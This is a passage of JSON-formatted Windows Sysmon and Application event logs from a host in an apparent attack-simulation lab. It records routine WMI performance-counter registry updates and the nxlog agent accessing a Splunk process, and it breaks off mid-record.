{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4407,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 06:53:14.930\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.930","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4408,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 06:53:14.930\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.930","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4409,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 06:53:14.930\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.930","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4410,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 06:53:14.930\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.930","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4411,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:14.930\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\PerfIniFile\r\nDetails: WmiApRpl.ini","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.930","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\PerfIniFile","Details":"WmiApRpl.ini","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4412,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:14.930\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating\r\nDetails: WmiApRpl","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:14.930","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Details":"WmiApRpl","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4413,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:15.008\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter\r\nDetails: DWORD (0x000063ca)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:15.008","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter","Details":"DWORD (0x000063ca)","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4414,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:15.008\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help\r\nDetails: DWORD (0x000063cb)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:15.008","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help","Details":"DWORD (0x000063cb)","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4415,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:15.008\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter\r\nDetails: DWORD (0x000063ca)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:15.008","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter","Details":"DWORD (0x000063ca)","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4416,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:15.008\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help\r\nDetails: DWORD (0x000063cb)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:15.008","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help","Details":"DWORD (0x000063cb)","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4417,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:15.008\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter\r\nDetails: DWORD (0x00006324)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:15.008","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter","Details":"DWORD (0x00006324)","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1000,"SourceName":"Microsoft-Windows-LoadPerf","ProviderGuid":"{122EE297-BB47-41AE-B265-1CA8D1886D40}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12127,"ProcessID":3836,"ThreadID":3816,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Performance counters for the WmiApRpl (WmiApRpl) service were loaded successfully. The Record Data in the data section contains the new index values assigned to this service.","Opcode":"Info","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4418,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:15.008\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help\r\nDetails: DWORD (0x00006325)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:15.008","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help","Details":"DWORD (0x00006325)","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4419,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:15.008\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List\r\nDetails: 25380 25386 25396 25406 25426 25470 25480 25518 25524 25540","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:15.008","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List","Details":"25380 25386 25396 25406 25426 25470 25480 25518 25524 25540","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4420,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 06:53:15.008\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:15.008","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4421,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:15.493\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:15.493","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4422,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:16.493\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 